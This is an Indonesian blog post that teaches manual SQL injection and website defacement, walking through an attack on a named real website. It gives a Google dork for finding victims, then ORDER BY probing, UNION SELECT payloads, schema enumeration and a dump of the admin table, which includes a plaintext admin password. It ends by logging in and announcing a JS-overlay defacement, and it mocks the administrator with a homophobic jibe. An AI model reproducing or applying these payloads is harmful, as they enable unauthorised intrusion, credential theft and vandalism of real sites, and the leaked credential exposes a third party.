1. sediakan google dork yang fresh
misal ; saya mengunakan dork ini; inurl:" research.php?cid="
2. masukan di column google
3. jika sudah muncul web nya pilih salah satu
4. saya memilih web korban ini
htttp://kkverma.com/content/research.php?cid=2
5. jika sudah tambahkan ' pada akhir url untuk memastikan
vuln / kagak
6. sehingga menjadi
htttp://kkverma.com/content/research.php?cid=2'
7. jika tertulis u have an error in your sql syntax....blablabla
berarti web nya vuln
8. kita mencari jumlah database nya dengan perintah"order by"
http://kkverma.com/content/research.php?cid=2 order by 1-- normal
http://kkverma.com/content/research.php?cid=2 order by 2-- normal
http://kkverma.com/content/research.php?cid=2 order by 3-- normal
http://kkverma.com/content/research.php?cid=2 order by 4-- normal
http://kkverma.com/content/research.php?cid=2 order by 5-- normal
http://kkverma.com/content/research.php?cid=2 order by 6-- ERROR
di 6 kita mendapatkan unknown column'6'in order clause
berarti column database nya 5
9. kita mencari angka ajaib mulai
http://kkverma.com/content/research.php?cid=-2 union select 1,2,3,4,5--
[ ingat, setelah ?cid= diberi tanda - ]
10. muncul angka ajaib 3,4
11. kita mencoba melihat versi php dg memasukan@@version/version()
jadi : http://kkverma.com/content/research.php?cid=-2 union select
1,2,version(),4,5 -- [karena 3 tadi termasuk angka ajaib]
Tertulis 5.1.61 . Versi php 5 . Berarti tutorial ini masih bisa dilanjutkan.
Karena jika menemukan php versi 4 kita harus menebak sendiri isi/tabel dari
databasenya.
Step 5 :
Kita akan memunculkan nama-nama table yang ada di dalam database dengan
mengganti perintah “ @@version ” dengan “group_concat(table_name) ” dan
menambahkan perintah
“ from information_schema.tables where table_schema=database() ”
sesudah angka terakhir , sebelum tanda --
menjadi
http://kkverma.com/content/research.php?cid=-2
union select 1,2,group_concat(table_name),4,5 from information_schema.tables
where table_schema=database()--
Kita melihat ada table admin, research, vcounter .
Step 6 :
Sekarang main logika disini. Dimana biasanya akan disimpan data berupa
user dan password ? Tentu jawabannya adalah di table admin.
Kita coba melihat kolom dari table admin tersebut .
Disinilah hackbar dibutuhkan. Untuk merubah suatu kata menjadi bentuk
MySQL CHAR(). Caranya : klik tombol SQL -> MySQL -> MySQL CHAR() .
Lalu kita convert kata "admin" menjadi bentuk MySQL CHAR() .
Tutorial Cara Deface Menggunakan SQL Manual
Dan hasil convert dari kata admin adalah CHAR(97, 100, 109, 105, 110)
Step 7 :
Tahap selanjutnya yaitu mengetahui kolom yang ada pada table admin tersebut.
Cara mengganti perintah “ group_concat(table_name) ” dengan perintah
“ group_concat(column_name) ” dan mengganti perintah “
information_schema.tables “ menjadi “ information_schema.columns ”
juga mengganti perintah “ table_schema=database() ” dengan perintah
“ table_name=[hasil convert MySQL CHAR() - Step 6] ”
http://kkverma.com/content/research.php?cid=-2
union select 1,2,group_concat(column_name),4,5
from information_schema.columns where table_name=CHAR(97,100,109,105,110)--
Kita mendapat kolom aid, admin id, admin pass di tabel admin.
Step 8 :
Sekarang kita coba membuka data yang ada di kolom aid, admin id , dan admin pass .
Caranya ialah mengganti perintah group_concat(table_name)
menjadi group_concat(aid,0x3a,admin_id,0x3a,admin_pass)
dan mengganti perintah “ from information_schema.
columns where table_name=CHAR(97, 100, 109, 105, 110)—“ dengan perintah
“from admin—“ . disitu kita melihat ada tanda 0x3a.
Apa maksudnya ? 0x3a adalah bentuk HEX dari tanda :
sehingga data nanti akan dipisah dengan tanda : .
http://kkverma.com/content/research.php?cid=-2 union
select 1,2,group_concat(aid,0x3a,admin_id,0x3a,admin_pass),4,5 from admin--
Kita mendapatkan data berikut ;
aid : 1
Admin ID : admin
Admin Pass : bimogay --- adminnya bernama Bimo, orangnya Gay. Hihihi
Step 9 :
Sekarang kita coba mencari halaman loginnya. Tidak bakal jauh dari kata "admin"
ataupun "login" . Kalo malas mencari manual, cari dengan software Admin Finder.
Cari sendiri di Google.
Kita menemukan halaman loginnya terletak di :
http://kkverma.com/admin
Masukkan user dan password sesuai dengan data yang telah kita dapat.
Dan.......
Tutorial Cara Deface Menggunakan SQL Manual
Uh, indahnya dunia ini. :v
Masuk halaman admin bray. Namun ternyata tidak bisa upload shell. Kita deface saja dengan metode JS Overlay.
0 komentar:
Posting Komentar